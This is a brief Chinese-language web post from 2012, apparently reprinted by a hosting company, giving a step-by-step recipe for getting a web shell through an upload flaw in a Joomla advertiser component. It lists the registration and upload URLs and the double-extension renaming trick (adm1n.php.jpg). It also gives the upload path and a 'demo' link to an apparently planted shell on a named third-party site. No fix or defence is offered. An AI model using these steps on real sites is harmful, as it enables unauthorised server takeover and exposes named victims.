Joomla 遠程上傳漏洞.直接getshell |
發(fā)布時間: 2012/7/28 19:00:28 |
1. 有些joomal需要先注冊.
http://site/index.php?option=com_user&view=login
2. 到上傳地址
http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
3. 點擊image后點擊upload,選擇shell, 將shell重名為adm1n.php.jpg格式.
4. 上傳后的文件在 / images/ksadvertiser/U0 這個目錄下.
http://site/images/ksadvertiser/U0/adm1n.php.gif
Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888 聯(lián)系:億恩小凡 QQ:89317007 電話:0371-63322206 本文出自:億恩科技【www.allwellnessguide.com】 |